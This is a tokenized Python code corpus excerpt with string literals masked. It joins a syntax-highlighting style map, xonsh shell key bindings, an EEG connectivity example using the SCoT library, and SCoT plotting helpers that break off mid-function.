'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , 
<EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> STYLES = { <EOL> '<STR_LIT>' : ALGOL_STYLE , <EOL> '<STR_LIT>' : ALGOL_NU_STYLE , <EOL> '<STR_LIT>' : AUTUMN_STYLE , <EOL> '<STR_LIT>' : BORLAND_STYLE , <EOL> '<STR_LIT>' : BW_STYLE , <EOL> '<STR_LIT>' : COLORFUL_STYLE , <EOL> '<STR_LIT:default>' : DEFAULT_STYLE , <EOL> '<STR_LIT>' : EMACS_STYLE , <EOL> '<STR_LIT>' : FRIENDLY_STYLE , <EOL> '<STR_LIT>' : FRUITY_STYLE , <EOL> '<STR_LIT>' : IGOR_STYLE , <EOL> '<STR_LIT>' : LOVELACE_STYLE , <EOL> '<STR_LIT>' : MANNI_STYLE , <EOL> '<STR_LIT>' : MONOKAI_STYLE , <EOL> '<STR_LIT>' : MURPHY_STYLE , <EOL> '<STR_LIT>' : NATIVE_STYLE , <EOL> '<STR_LIT>' : PARAISO_DARK_STYLE , <EOL> '<STR_LIT>' : PARAISO_LIGHT_STYLE , <EOL> '<STR_LIT>' : PASTIE_STYLE , <EOL> '<STR_LIT>' : PERLDOC_STYLE , <EOL> '<STR_LIT>' : RRT_STYLE , <EOL> '<STR_LIT>' : TANGO_STYLE , <EOL> '<STR_LIT>' : TRAC_STYLE , <EOL> '<STR_LIT>' : VIM_STYLE , <EOL> '<STR_LIT>' : VS_STYLE 
, <EOL> '<STR_LIT>' : XCODE_STYLE , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import builtins <EOL> from prompt_toolkit . filters import Filter , IsMultiline <EOL> from prompt_toolkit . keys import Keys <EOL> from xonsh . tools import ON_WINDOWS <EOL> env = builtins . __xonsh_env__ <EOL> indent_ = env . get ( '<STR_LIT>' ) <EOL> DEDENT_TOKENS = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def carriage_return ( b , cli ) : <EOL> """<STR_LIT>""" <EOL> at_end_of_line = _is_blank ( b . document . current_line_after_cursor ) <EOL> current_line_blank = _is_blank ( b . document . current_line ) <EOL> if ( b . document . current_line_before_cursor . strip ( ) . endswith ( '<STR_LIT::>' ) and <EOL> at_end_of_line ) : <EOL> b . newline ( ) <EOL> b . insert_text ( indent_ , fire_event = False ) <EOL> elif ( not current_line_blank and <EOL> b . document . current_line . split ( maxsplit = <NUM_LIT:1> ) [ <NUM_LIT:0> ] in DEDENT_TOKENS and <EOL> b . document . line_count > <NUM_LIT:1> ) : <EOL> b . newline ( copy_margin = True ) <EOL> _ = b . delete_before_cursor ( count = len ( indent_ ) ) <EOL> elif ( not b . document . on_first_line and <EOL> not current_line_blank ) : <EOL> b . newline ( copy_margin = True ) <EOL> elif ( b . document . char_before_cursor == '<STR_LIT:\\>' and <EOL> not ( not builtins . __xonsh_env__ . get ( '<STR_LIT>' ) <EOL> and ON_WINDOWS ) ) : <EOL> b . newline ( ) <EOL> elif ( b . document . find_next_word_beginning ( ) is not None and <EOL> ( any ( not _is_blank ( i ) <EOL> for i <EOL> in b . document . lines_from_current [ <NUM_LIT:1> : ] ) ) ) : <EOL> b . newline ( copy_margin = True ) <EOL> elif not current_line_blank and not can_compile ( b . document . text ) : <EOL> b . newline ( ) <EOL> else : <EOL> b . accept_action . validate_and_handle ( cli , b ) <EOL> class TabShouldInsertIndentFilter ( Filter ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , cli ) : <EOL> before_cursor = cli . current_buffer . document . 
current_line_before_cursor <EOL> return bool ( before_cursor . isspace ( ) ) <EOL> class BeginningOfLine ( Filter ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , cli ) : <EOL> before_cursor = cli . current_buffer . document . current_line_before_cursor <EOL> return bool ( len ( before_cursor ) == <NUM_LIT:0> <EOL> and not cli . current_buffer . document . on_first_line ) <EOL> class EndOfLine ( Filter ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , cli ) : <EOL> d = cli . current_buffer . document <EOL> at_end = d . is_cursor_at_the_end_of_line <EOL> last_line = d . is_cursor_at_the_end <EOL> return bool ( at_end and not last_line ) <EOL> def can_compile ( src ) : <EOL> """<STR_LIT>""" <EOL> src = src if src . endswith ( '<STR_LIT:\n>' ) else src + '<STR_LIT:\n>' <EOL> src = src . lstrip ( ) <EOL> try : <EOL> builtins . __xonsh_execer__ . compile ( src , mode = '<STR_LIT>' , glbs = None , <EOL> locs = builtins . __xonsh_ctx__ ) <EOL> rtn = True <EOL> except SyntaxError : <EOL> rtn = False <EOL> return rtn <EOL> def load_xonsh_bindings ( key_bindings_manager ) : <EOL> """<STR_LIT>""" <EOL> handle = key_bindings_manager . registry . add_binding <EOL> @ handle ( Keys . Tab , filter = TabShouldInsertIndentFilter ( ) ) <EOL> def _ ( event ) : <EOL> """<STR_LIT>""" <EOL> event . cli . current_buffer . insert_text ( env . get ( '<STR_LIT>' ) ) <EOL> @ handle ( Keys . BackTab ) <EOL> def insert_literal_tab ( event ) : <EOL> """<STR_LIT>""" <EOL> event . cli . current_buffer . insert_text ( env . get ( '<STR_LIT>' ) ) <EOL> @ handle ( Keys . ControlJ , filter = IsMultiline ( ) ) <EOL> def multiline_carriage_return ( event ) : <EOL> """<STR_LIT>""" <EOL> b = event . cli . current_buffer <EOL> carriage_return ( b , event . cli ) <EOL> @ handle ( Keys . Left , filter = BeginningOfLine ( ) ) <EOL> def wrap_cursor_back ( event ) : <EOL> """<STR_LIT>""" <EOL> b = event . cli . current_buffer <EOL> b . cursor_up ( count = <NUM_LIT:1> ) <EOL> relative_end_index = b . 
document . get_end_of_line_position ( ) <EOL> b . cursor_right ( count = relative_end_index ) <EOL> @ handle ( Keys . Right , filter = EndOfLine ( ) ) <EOL> def wrap_cursor_forward ( event ) : <EOL> """<STR_LIT>""" <EOL> b = event . cli . current_buffer <EOL> relative_begin_index = b . document . get_start_of_line_position ( ) <EOL> b . cursor_left ( count = abs ( relative_begin_index ) ) <EOL> b . cursor_down ( count = <NUM_LIT:1> ) <EOL> def _is_blank ( l ) : <EOL> return len ( l . strip ( ) ) == <NUM_LIT:0> </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import scot <EOL> import scotdata . motorimagery as midata <EOL> raweeg = midata . eeg . T <EOL> triggers = np . asarray ( midata . triggers , dtype = int ) <EOL> classes = midata . classes <EOL> fs = midata . samplerate <EOL> locs = midata . locations <EOL> np . random . seed ( <NUM_LIT> ) <EOL> ws = scot . Workspace ( { '<STR_LIT>' : <NUM_LIT> } , reducedim = <NUM_LIT:4> , fs = fs , locations = locs ) <EOL> data = scot . datatools . cut_segments ( raweeg , triggers , <NUM_LIT:3> * fs , <NUM_LIT:4> * fs ) <EOL> ws . set_data ( data , classes ) <EOL> ws . do_cspvarica ( ) <EOL> p = ws . var_ . test_whiteness ( <NUM_LIT:50> ) <EOL> print ( '<STR_LIT>' , p ) <EOL> data = scot . datatools . cut_segments ( raweeg , triggers , - <NUM_LIT:2> * fs , <NUM_LIT:8> * fs ) <EOL> ws . plot_f_range = [ <NUM_LIT:0> , <NUM_LIT:30> ] <EOL> ws . plot_diagonal = '<STR_LIT>' <EOL> ws . plot_outside_topo = False <EOL> ws . set_data ( data , classes , time_offset = - <NUM_LIT:1> ) <EOL> fig = ws . plot_connectivity_topos ( ) <EOL> ws . set_used_labels ( [ '<STR_LIT>' ] ) <EOL> ws . get_tf_connectivity ( '<STR_LIT>' , <NUM_LIT:1> * fs , int ( <NUM_LIT> * fs ) , plot = fig , <EOL> crange = [ <NUM_LIT:0> , <NUM_LIT:30> ] ) <EOL> fig . suptitle ( '<STR_LIT>' ) <EOL> fig = ws . plot_connectivity_topos ( ) <EOL> ws . set_used_labels ( [ '<STR_LIT>' ] ) <EOL> ws . get_tf_connectivity ( '<STR_LIT>' , <NUM_LIT:1> * fs , int ( <NUM_LIT> * fs ) , plot = fig , <EOL> crange = [ <NUM_LIT:0> , <NUM_LIT:30> ] ) <EOL> fig . suptitle ( '<STR_LIT>' ) <EOL> ws . show_plots ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> def show_plots ( ) : <EOL> import matplotlib . pyplot as plt <EOL> plt . show ( ) <EOL> def new_figure ( * args , ** kwargs ) : <EOL> import matplotlib . pyplot as plt <EOL> return plt . figure ( * args , ** kwargs ) <EOL> def current_axis ( ) : <EOL> import matplotlib . pyplot as plt <EOL> return plt . gca ( ) <EOL> def MaxNLocator ( * args , ** kwargs ) : <EOL> from matplotlib . ticker import MaxNLocator as mnl <EOL> return mnl ( * args , ** kwargs ) <EOL> def prepare_topoplots ( topo , values ) : <EOL> """<STR_LIT>""" <EOL> values = np . atleast_2d ( values ) <EOL> topomaps = [ ] <EOL> for i in range ( values . shape [ <NUM_LIT:0> ] ) : <EOL> topo . set_values ( values [ i , : ] ) <EOL> topo . create_map ( ) <EOL> topomaps . append ( topo . get_map ( ) ) <EOL> return topomaps <EOL> def plot_topo ( axis , topo , topomap , crange = None , offset = ( <NUM_LIT:0> , <NUM_LIT:0> ) ) : <EOL> """<STR_LIT>""" <EOL> topo . set_map ( topomap ) <EOL> h = topo . plot_map ( axis , crange = crange , offset = offset ) <EOL> topo . plot_locations ( axis , offset = offset ) <EOL> topo . plot_head ( axis , offset = offset ) <EOL> return h <EOL> def plot_sources ( topo , mixmaps , unmixmaps , global_scale = None , fig = None ) : <EOL> """<STR_LIT>""" <EOL> urange , mrange = None , None <EOL> m = len ( mixmaps ) <EOL> if global_scale : <EOL> tmp = np . asarray ( unmixmaps ) <EOL> tmp = tmp [ np . logical_not ( np . isnan ( tmp ) ) ] <EOL> umax = np . percentile ( np . abs ( tmp ) , global_scale ) <EOL> umin = - umax <EOL> urange = [ umin , umax ] <EOL> tmp = np . asarray ( mixmaps ) <EOL> tmp = tmp [ np . logical_not ( np . isnan ( tmp ) ) ] <EOL> mmax = np . percentile ( np . abs ( tmp ) , global_scale ) <EOL> mmin = - mmax <EOL> mrange = [ mmin , mmax ] <EOL> y = np . floor ( np . sqrt ( m * <NUM_LIT:3> / <NUM_LIT:4> ) ) <EOL> x = np . 
ceil ( m / y ) <EOL> if fig is None : <EOL> fig = new_figure ( ) <EOL> axes = [ ] <EOL> for i in range ( m ) : <EOL> axes . append ( fig . add_subplot ( <NUM_LIT:2> * y , x , i + <NUM_LIT:1> ) ) <EOL> plot_topo ( axes [ - <NUM_LIT:1> ] , topo , unmixmaps [ i ] , crange = urange ) <EOL> axes [ - <NUM_LIT:1> ] . set_title ( str ( i ) ) <EOL> axes . append ( fig . add_subplot ( <NUM_LIT:2> * y , x , m + i + <NUM_LIT:1> ) ) <EOL> plot_topo ( axes [ - <NUM_LIT:1> ] , topo , mixmaps [ i ] , crange = mrange ) <EOL> axes [ - <NUM_LIT:1> ] . set_title ( str ( i ) ) <EOL> for a in axes : <EOL> a . set_yticks ( [ ] ) <EOL> a . set_xticks ( [ ] ) <EOL> a . set_frame_on ( False ) <EOL> axes [ <NUM_LIT:0> ] . set_ylabel ( '<STR_LIT>' ) <EOL> axes [ <NUM_LIT:1> ] . set_ylabel ( '<STR_LIT>' ) <EOL> return fig <EOL> def plot_connectivity_topos ( layout = '<STR_LIT>' , topo = None , topomaps = None , fig = None ) : <EOL> """<STR_LIT>""" <EOL> m = len ( topomaps ) <EOL> if fig is None : <EOL> fig = new_figure ( ) <EOL> if layout == '<STR_LIT>' : <EOL> for i in range ( m ) : <EOL> ax = fig . add_subplot ( m , m , i * ( <NUM_LIT:1> + m ) + <NUM_LIT:1> ) <EOL> plot_topo ( ax , topo , topomaps [ i ] ) <EOL> ax . set_yticks ( [ ] ) <EOL> ax . set_xticks ( [ ] ) <EOL> ax . set_frame_on ( False ) <EOL> else : <EOL> for i in range ( m ) : <EOL> for j in [ i + <NUM_LIT:2> , ( i + <NUM_LIT:1> ) * ( m + <NUM_LIT:1> ) + <NUM_LIT:1> ] : <EOL> ax = fig . add_subplot ( m + <NUM_LIT:1> , m + <NUM_LIT:1> , j ) <EOL> plot_topo ( ax , topo , topomaps [ i ] ) <EOL> ax . set_yticks ( [ ] ) <EOL> ax . set_xticks ( [ ] ) <EOL> ax . set_frame_on ( False ) <EOL> return fig <EOL> def plot_connectivity_spectrum ( a , fs = <NUM_LIT:2> , freq_range = ( - np . inf , np . inf ) , diagonal = <NUM_LIT:0> , border = False , fig = None ) : <EOL> """<STR_LIT>""" <EOL> a = np . atleast_3d ( a ) <EOL> if a . ndim == <NUM_LIT:3> : <EOL> [ _ , m , f ] = a . 
shape <EOL> l = <NUM_LIT:0> <EOL> else : <EOL> [ l , _ , m , f ] = a . shape <EOL> freq = np . linspace ( <NUM_LIT:0> , fs / <NUM_LIT:2> , f ) <EOL> lowest , highest = np . inf , - np . inf <EOL> left = max ( freq_range [ <NUM_LIT:0> ] , freq [ <NUM_LIT:0> ] ) <EOL> right = min ( freq_range [ <NUM_LIT:1> ] , freq [ - <NUM_LIT:1> ] ) <EOL> if fig is None : <EOL> fig = new_figure ( ) <EOL> axes = [ ] <EOL> for i in range ( m ) : <EOL> if diagonal == <NUM_LIT:1> : <EOL> jrange = [ i ] <EOL> elif diagonal == <NUM_LIT:0> : <EOL> jrange = range ( m ) <EOL> else : <EOL> jrange = [ j for j in range ( m ) if j != i ] <EOL> for j in jrange : <EOL> if border : <EOL> ax = fig . add_subplot ( m + <NUM_LIT:1> , m + <NUM_LIT:1> , j + ( i + <NUM_LIT:1> ) * ( m + <NUM_LIT:1> ) + <NUM_LIT:2> ) <EOL> else : <EOL> ax = fig . add_subplot ( m , m , j + i * m + <NUM_LIT:1> ) <EOL> axes . append ( ( i , j , ax ) ) <EOL> if l == <NUM_LIT:0> : <EOL> ax . plot ( freq , a [ i , j , : ] ) <EOL> lowest = min ( lowest , np . min ( a [ i , j , : ] ) ) <EOL> highest = max ( highest , np . max ( a [ i , j , : ] ) ) <EOL> elif l == <NUM_LIT:1> : <EOL> ax . fill_between ( freq , <NUM_LIT:0> , a [ <NUM_LIT:0> , i , j , : ] , facecolor = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , alpha = <NUM_LIT> ) <EOL> lowest = min ( lowest , np . min ( a [ <NUM_LIT:0> , i , j , : ] ) ) <EOL> highest = max ( highest , np . max ( a [ <NUM_LIT:0> , i , j , : ] ) ) <EOL> else : <EOL> baseline , = ax . plot ( freq , a [ <NUM_LIT:0> , i , j , : ] ) <EOL> ax . fill_between ( freq , a [ <NUM_LIT:1> , i , j , : ] , a [ <NUM_LIT:2> , i , j , : ] , facecolor = baseline . get_color ( ) , alpha = <NUM_LIT> ) <EOL> lowest = min ( lowest , np . min ( a [ : , i , j , : ] ) ) <EOL> highest = max ( highest , np . max ( a [ : , i , j , : ] ) ) <EOL> for i , j , ax in axes : <EOL> ax . xaxis . set_major_locator ( MaxNLocator ( max ( <NUM_LIT:1> , <NUM_LIT:7> - m ) ) ) <EOL> ax . yaxis . 
set_major_locator ( MaxNLocator ( max ( <NUM_LIT:1> , <NUM_LIT:7> - m ) ) ) <EOL> al = ax . get_ylim ( ) <EOL> ax . set_ylim ( min ( al [ <NUM_LIT:0> ] , lowest ) , max ( al [ <NUM_LIT:1> ] , highest ) ) <EOL> ax . set_xlim ( left , right ) <EOL> if <NUM_LIT:0> < i < m - <NUM_LIT:1> : <EOL> ax . set_xticks ( [ ] ) <EOL> if <NUM_LIT:0> < j < m - <NUM_LIT:1> : <EOL> ax . set_yticks ( [ ] ) <EOL> if i == <NUM_LIT:0> : <EOL> ax . xaxis . tick_top ( ) <EOL> if i == m - <NUM_LIT:1> : <EOL> ax . xaxis . tick_bottom ( ) <EOL> if j == <NUM_LIT:0> : <EOL> ax . yaxis . tick_left ( ) <EOL> if j == m - <NUM_LIT:1> : <EOL> ax . yaxis . tick_right ( ) <EOL> _plot_labels ( fig , <EOL> { '<STR_LIT:x>' : <NUM_LIT:0.5> , '<STR_LIT:y>' : <NUM_LIT> , '<STR_LIT:s>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT:0.5> , '<STR_LIT:s>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> return fig <EOL> def plot_connectivity_significance ( s , fs = <NUM_LIT:2> , freq_range = ( - np . inf , np . inf ) , diagonal = <NUM_LIT:0> , border = False , fig = None ) : <EOL> """<STR_LIT>""" <EOL> a = np . atleast_3d ( s ) <EOL> [ _ , m , f ] = a . shape <EOL> freq = np . linspace ( <NUM_LIT:0> , fs / <NUM_LIT:2> , f ) <EOL> left = max ( freq_range [ <NUM_LIT:0> ] , freq [ <NUM_LIT:0> ] ) <EOL> right = min ( freq_range [ <NUM_LIT:1> ] , freq [ - <NUM_LIT:1> ] ) <EOL> imext = ( freq [ <NUM_LIT:0> ] , freq [ - <NUM_LIT:1> ] , - <NUM_LIT> , <NUM_LIT> ) <EOL> if fig is None : <EOL> fig = new_figure ( ) <EOL> axes = [ ] <EOL> for i in range ( m ) : <EOL> if diagonal == <NUM_LIT:1> : <EOL> jrange = [ i ] <EOL> elif diagonal == <NUM_LIT:0> : <EOL> jrange = range ( m ) <EOL> else : <EOL> jrange = [ j for j in range ( m ) if j != i ] <EOL> for j in jrange : <EOL> if border : <EOL> ax = fig . 
add_subplot ( m + <NUM_LIT:1> , m + <NUM_LIT:1> , j + ( i + <NUM_LIT:1> ) * ( m + <NUM_LIT:1> ) + <NUM_LIT:2> ) <EOL> else : <EOL> ax = fig . add_subplot ( m , m , j + i * m + <NUM_LIT:1> ) <EOL> axes . append ( ( i , j , ax ) ) <EOL> ax . imshow ( s [ i , j , np . newaxis ] , vmin = <NUM_LIT:0> , vmax = <NUM_LIT:2> , cmap = '<STR_LIT>' , aspect = '<STR_LIT>' , extent = imext , zorder = - <NUM_LIT> ) <EOL> ax . xaxis . set_major_locator ( MaxNLocator ( max ( <NUM_LIT:1> , <NUM_LIT:7> - m ) ) ) <EOL> ax . yaxis . set_major_locator ( MaxNLocator ( max ( <NUM_LIT:1> , <NUM_LIT:7> - m ) ) ) <EOL> ax . set_xlim ( left , right ) <EOL> if <NUM_LIT:0> < i < m - <NUM_LIT:1> : <EOL> ax . set_xticks ( [ ] ) <EOL> if <NUM_LIT:0> < j < m - <NUM_LIT:1> : <EOL> ax . set_yticks ( [ ] ) <EOL> if j == <NUM_LIT:0> : <EOL> ax . yaxis . tick_left ( ) <EOL> if j == m - <NUM_LIT:1> : <EOL> ax . yaxis . tick_right ( ) <EOL> _plot_labels ( fig , <EOL> { '<STR_LIT:x>' : <NUM_LIT:0.5> , '<STR_LIT:y>' : <NUM_LIT> , '<STR_LIT:s>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT:0.5> , '<STR_LIT:s>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> return fig <EOL> def plot_connectivity_timespectrum ( a , fs = <NUM_LIT:2> , crange = None , freq_range = ( - np . inf , np . inf ) , time_range = None , diagonal = <NUM_LIT:0> , border = False , fig = None ) : <EOL> """<STR_LIT>""" <EOL> a = np . asarray ( a ) <EOL> [ _ , m , _ , t ] = a . shape <EOL> if crange is None : <EOL> crange = [ np . min ( a ) , np . 
max ( a ) ] <EOL> if time_range is None : <EOL> t0 = <NUM_LIT:0> <EOL> t1 = t <EOL> else : <EOL> t0 , t1 = time_range <EOL> f0 , f1 = fs / <NUM_LIT:2> , <NUM_LIT:0> <EOL> extent = [ t0 , t1 , f0 , f1 ] <EOL> ymin = max ( freq_range [ <NUM_LIT:0> ] , f1 ) <EOL> ymax = min ( freq_range [ <NUM_LIT:1> ] , f0 ) <EOL> if fig is None : <EOL> fig = new_figure ( ) <EOL> axes = [ ] <EOL> for i in range ( m ) : <EOL> if diagonal == <NUM_LIT:1> : <EOL> jrange = [ i ] <EOL> elif diagonal == <NUM_LIT:0> : <EOL> jrange = range ( m ) <EOL> else : <EOL> jrange = [ j for j in range ( m ) if j != i ] <EOL> for j in jrange : <EOL> if border : <EOL> ax = fig . add_subplot ( m + <NUM_LIT:1> , m + <NUM_LIT:1> , j + ( i + <NUM_LIT:1> ) * ( m + <NUM_LIT:1> ) + <NUM_LIT:2> ) <EOL> else : <EOL> ax = fig . add_subplot ( m , m , j + i * m + <NUM_LIT:1> ) <EOL> axes . append ( ax ) <EOL> ax . imshow ( a [ i , j , : , : ] , vmin = crange [ <NUM_LIT:0> ] , vmax = crange [ <NUM_LIT:1> ] , aspect = '<STR_LIT>' , extent = extent ) <EOL> ax . invert_yaxis ( ) <EOL> ax . xaxis . set_major_locator ( MaxNLocator ( max ( <NUM_LIT:1> , <NUM_LIT:9> - m ) ) ) <EOL> ax . yaxis . set_major_locator ( MaxNLocator ( max ( <NUM_LIT:1> , <NUM_LIT:7> - m ) ) ) <EOL> ax . set_ylim ( ymin , ymax ) <EOL> if <NUM_LIT:0> < i < m - <NUM_LIT:1> : <EOL> ax . set_xticks ( [ ] ) <EOL> if <NUM_LIT:0> < j < m - <NUM_LIT:1> : <EOL> ax . set_yticks ( [ ] ) <EOL> if i == <NUM_LIT:0> : <EOL> ax . xaxis . tick_top ( ) <EOL> if i == m - <NUM_LIT:1> : <EOL> ax . xaxis . tick_bottom ( ) <EOL> if j == <NUM_LIT:0> : <EOL> ax . yaxis . tick_left ( ) <EOL> if j == m - <NUM_LIT:1> : <EOL> ax . yaxis . 
tick_right ( ) <EOL> _plot_labels ( fig , <EOL> { '<STR_LIT:x>' : <NUM_LIT:0.5> , '<STR_LIT:y>' : <NUM_LIT> , '<STR_LIT:s>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT:0.5> , '<STR_LIT:s>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> return fig <EOL> def plot_circular ( widths , colors , curviness = <NUM_LIT> , mask = True , topo = None , topomaps = None , axes = None , order = None ) : <EOL> """<STR_LIT>""" <EOL> colors = np . asarray ( colors ) <EOL> widths = np . asarray ( widths ) <EOL> mask = np . asarray ( mask ) <EOL> colors = np . maximum ( colors , <NUM_LIT:0> ) <EOL> colors = np . minimum ( colors , <NUM_LIT:1> ) <EOL> if len ( widths . shape ) > <NUM_LIT:2> : <EOL> [ n , m ] = widths . shape <EOL> elif len ( colors . shape ) > <NUM_LIT:3> : <EOL> [ n , m , c ] = widths . shape <EOL> elif len ( mask . shape ) > <NUM_LIT:2> : <EOL> [ n , m ] = mask . shape <EOL> else : <EOL> n = len ( topomaps ) <EOL> m = n <EOL> if not order : <EOL> order = list ( range ( n ) ) <EOL> assert ( n == m ) <EOL> if axes is None : <EOL> fig = new_figure ( ) <EOL> axes = fig . add_subplot ( <NUM_LIT> ) <EOL> axes . set_yticks ( [ ] ) <EOL> axes . set_xticks ( [ ] ) <EOL> axes . set_frame_on ( False ) <EOL> if len ( colors . shape ) < <NUM_LIT:3> : <EOL> colors = np . tile ( colors , ( n , n , <NUM_LIT:1> ) ) <EOL> if len ( widths . shape ) < <NUM_LIT:2> : <EOL> widths = np . tile ( widths , ( n , n ) ) <EOL> if len ( mask . shape ) < <NUM_LIT:2> : <EOL> mask = np . tile ( mask , ( n , n ) ) <EOL> np . fill_diagonal ( mask , False ) <EOL> if topo : <EOL> alpha = <NUM_LIT> if n < <NUM_LIT:10> else <NUM_LIT> <EOL> r = alpha * topo . head_radius / ( np . sin ( np . pi / n ) ) <EOL> else : <EOL> r = <NUM_LIT:1> <EOL> for i in range ( n ) : <EOL> if topo : <EOL> o = ( r * np . sin ( i * <NUM_LIT:2> * np . pi / n ) , r * np . cos ( i * <NUM_LIT:2> * np . 
pi / n ) ) <EOL> plot_topo ( axes , topo , topomaps [ order [ i ] ] , offset = o ) <EOL> for i in range ( n ) : <EOL> for j in range ( n ) : <EOL> if not mask [ order [ i ] , order [ j ] ] : <EOL> continue <EOL> a0 = j * <NUM_LIT:2> * np . pi / n <EOL> a1 = i * <NUM_LIT:2> * np . pi / n <EOL> x0 , y0 = r * np . sin ( a0 ) , r * np . cos ( a0 ) <EOL> x1 , y1 = r * np . sin ( a1 ) , r * np . cos ( a1 ) <EOL> ex = ( x0 + x1 ) / <NUM_LIT:2> <EOL> ey = ( y0 + y1 ) / <NUM_LIT:2> <EOL> en = np . sqrt ( ex ** <NUM_LIT:2> + ey ** <NUM_LIT:2> ) <EOL> if en < <NUM_LIT> : <EOL> en = <NUM_LIT:0> <EOL> ex = y0 / r <EOL> ey = - x0 / r <EOL> w = - r <EOL> else : <EOL> ex /= en <EOL> ey /= en <EOL> w = np . sqrt ( ( x1 - x0 ) ** <NUM_LIT:2> + ( y1 - y0 ) ** <NUM_LIT:2> ) / <NUM_LIT:2> <EOL> if x0 * y1 - y0 * x1 < <NUM_LIT:0> : <EOL> w = - w <EOL> d = en * ( <NUM_LIT:1> - curviness ) <EOL> h = en - d <EOL> t = np . linspace ( - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:100> ) <EOL> dist = ( t ** <NUM_LIT:2> + <NUM_LIT:2> * t + <NUM_LIT:1> ) * w ** <NUM_LIT:2> + ( t ** <NUM_LIT:4> - <NUM_LIT:2> * t ** <NUM_LIT:2> + <NUM_LIT:1> ) * h ** <NUM_LIT:2> <EOL> tmask1 = dist >= ( <NUM_LIT> * topo . head_radius ) ** <NUM_LIT:2> <EOL> tmask2 = dist >= ( <NUM_LIT> * topo . head_radius ) ** <NUM_LIT:2> <EOL> tmask = np . logical_and ( tmask1 , tmask2 [ : : - <NUM_LIT:1> ] ) <EOL> t = t [ tmask ] <EOL> x = ( h * t * t + d ) * ex - w * t * ey <EOL> y = ( h * t * t + d ) * ey + w * t * ex <EOL> s = np . 
sqrt ( ( x [ - <NUM_LIT:2> ] - x [ - <NUM_LIT:1> ] ) ** <NUM_LIT:2> + ( y [ - <NUM_LIT:2> ] - y [ - <NUM_LIT:1> ] ) ** <NUM_LIT:2> ) <EOL> width = widths [ order [ i ] , order [ j ] ] <EOL> x1 = <NUM_LIT:0.1> * width * ( x [ - <NUM_LIT:2> ] - x [ - <NUM_LIT:1> ] + y [ - <NUM_LIT:2> ] - y [ - <NUM_LIT:1> ] ) / s + x [ - <NUM_LIT:1> ] <EOL> y1 = <NUM_LIT:0.1> * width * ( y [ - <NUM_LIT:2> ] - y [ - <NUM_LIT:1> ] - x [ - <NUM_LIT:2> ] + x [ - <NUM_LIT:1> ] ) / s + y [ - <NUM_LIT:1> ] <EOL> x2 = <NUM_LIT:0.1> * width * ( x [ - <NUM_LIT:2> ] - x [ - <NUM_LIT:1> ] - y [ - <NUM_LIT:2> ] + y [ - <NUM_LIT:1> ] ) / s + x [ - <NUM_LIT:1> ] <EOL> y2 = <NUM_LIT:0.1> * width * ( y [ - <NUM_LIT:2> ] - y [ - <NUM_LIT:1> ] + x [ - <NUM_LIT:2> ] - x [ - <NUM_LIT:1> ] ) / s + y [ - <NUM_LIT:1> ] <EOL> x = np . concatenate ( [ x , [ x1 , x [ - <NUM_LIT:1> ] , x2 ] ] ) <EOL> y = np . concatenate ( [ y , [ y1 , y [ - <NUM_LIT:1> ] , y2 ] ] ) <EOL> axes . plot ( x , y , lw = width , color = colors [ order [ i ] , order [ j ] ] , solid_capstyle = '<STR_LIT>' , solid_joinstyle = '<STR_LIT>' ) <EOL> return axes <EOL> def plot_whiteness ( var , h , repeats = <NUM_LIT:1000> 